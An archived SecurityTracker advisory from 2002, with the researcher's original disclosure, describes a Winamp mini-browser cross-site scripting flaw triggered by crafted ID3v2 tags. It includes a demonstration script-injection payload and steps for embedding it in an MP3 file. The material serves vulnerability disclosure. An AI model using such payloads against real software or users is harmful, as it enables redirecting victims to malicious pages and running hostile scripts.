SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (Multimedia)  >   Winamp Vendors:   Nullsoft
Winamp MP3 Player Lets Malicious MP3 Files Control the Winamp Mini-browser and Cause Arbitrary HTML Scripts to Be Executed
SecurityTracker Alert ID:  1003963
SecurityTracker URL:  http://securitytracker.com/id/1003963
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 4 2002
Impact:   Execution of arbitrary code via local system
Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 2.78c, 2.79
Description:   A vulnerability was reported in the Winamp MP3 player. A remote user can create an MP3 file that, when played by Winamp, may be able to cause the Winamp mini-browser to execute arbitrary Javascript.

Winamp reportedly contains a built-in mini web browser that is enabled by default and displays information about audio files being played. Winamp will apparently direct the mini-browser to a URL at winamp.com, such as the following:

http://info.winamp.com/winamp/WA.html?Alb=&Art=LoveProject&Cid=winamp&Tid=&Track=Brick

Certain elements of this URL (e.g., title, artist, album) are determined based on the ID3v1/ID3v2 tag contained in the MP3 file. According to the report, Winamp's own web site does not filter "<" and ">" characters, allowing a remote user to make an MP3 file that, when played by Winamp, will cause malicious code to be executed by the mini-browser appearing to originate from the winamp web site [this cross-site scripting flaw in the winamp web site has since been corrected].

The following demonstration exploit ID3v2 tag is provided:

<mp3 id=m src=http://ANYURL><script>location=m.src</script>

The above demonstration exploit URL will reportedly direct the Winamp user to http://ANYURL when the MP3 file is loaded.
Impact:   A remote user can create a malicious MP3 file that may, inconjunction with a remote web site, be able to cause arbitrary javascript to be executed by the mini-browser when the MP3 file is played.
Solution:   No solution was available at the time of this entry.

[Note that the cross-site scripting flaw on the Winamp web site has been fixed.]
Vendor URL:  www.winamp.com/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:   Windows (Any)

Message History:   None.

 Source Message Contents
Date:  Wed, 3 Apr 2002 13:23:17 +0200 (CEST)
Subject:  Winamp: Mp3 file can control the minibrowser


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Title:      Winamp: Mp3 file can control the minibrowser
Date:       [2002-04-3]
Tested env: Winamp 2.78c, 2.79 with Win2000 Pro
Impact:     A special crafted mp3 file can control the
            minibrowser, such as directing to arbitrary
            webpage possibly containing mallicious
            html code. Also another "call home" issue.
Status:     Winamp contacted over two weeks ago,
            no response.
Vendor fix: Non. The fix should be on the server side.
Workaround: Disable minibrowser.                   _     _
            (enabled by default)                 o' \,=./ `o
Author:     Andreas Sandblad, sandblad@acc.umu.se   (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo--

PROBLEM:
Winamp has a built-in minibrowser to show information about songs beeing
played (enabled by default). For every song currently playing Winamp will
direct the minibrowser to an url like
http://info.winamp.com/winamp/WA.html?Alb=&Art=Love
Project&Cid=winamp&Tid=&Track=Brick
Winamp gets the title/artist/album information from the ID3v1/ID3v2 tag in
the mp3 file. The problem is that the html page doesn't filter "<" and ">"
characters making it possible to inject htmlcode to control the
minibrowser (yet another CSS problem).

EXPLOIT:
Every field in the ID3v1 tag is limited to max. 32 bytes so we use the
ID3v2 tag instead. It seems that Winamp has made some useless efforts to
stop our attack, namely to convert " and ' to \" and \' (server side).
This will of course not stop us.

So lets put the following html code in the album field of the ID3v2 tag of
our mp3-file:
<mp3 id=m src=http://ANYURL><script>location=m.src</script>
It will direct the user to http://ANYURL on load.

Adding an ID3v2 tag to a mp3 file is very simple. Open the file in Winamp,
right click on it and choose "File info". Unmark the ID3v1 tag and mark
ID3v2. Add the html code in the album field. Sometimes Winamp will
complain when creating the ID3v2 tag with some characters. Then you simply
have to hexedit the mp3 file instead.

                                                   _     _
                                                 o' \,=./ `o
                                                    (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo--
Andreas Sandblad, student in Engineering Physics
at the University of Umea, Sweden.
---------------------------------------------------------------


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2013, SecurityGlobal.net LLC